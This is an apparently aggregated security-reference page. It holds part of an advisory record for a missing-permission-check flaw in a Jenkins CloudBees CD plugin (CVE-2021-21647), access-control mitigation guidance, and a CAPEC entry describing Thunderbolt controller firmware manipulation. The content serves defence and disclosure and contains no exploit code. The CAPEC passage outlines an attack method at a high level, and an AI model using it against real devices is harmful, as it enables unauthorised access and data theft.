"published": "2022-05-24T17:48:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21647"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/electricflow-plugin/commit/597cbb1d767ae92c44b4cbd9525fa53ddab37117"
},
{
"type": "PACKAGE",
"url": "https://github.com/jenkinsci/electricflow-plugin"
},
{
"type": "WEB",
"url": "https://www.jenkins.io/security/advisory/2021-04-21/#SECURITY-2309"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/04/21/2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Missing permission check in Jenkins CloudBees CD Plugin allows scheduling builds"
}
Mitigation
- Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
- Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].
Mitigation MIT-4.4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
- For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
- One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.
CAPEC-665: Exploitation of Thunderbolt Protection Flaws
An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.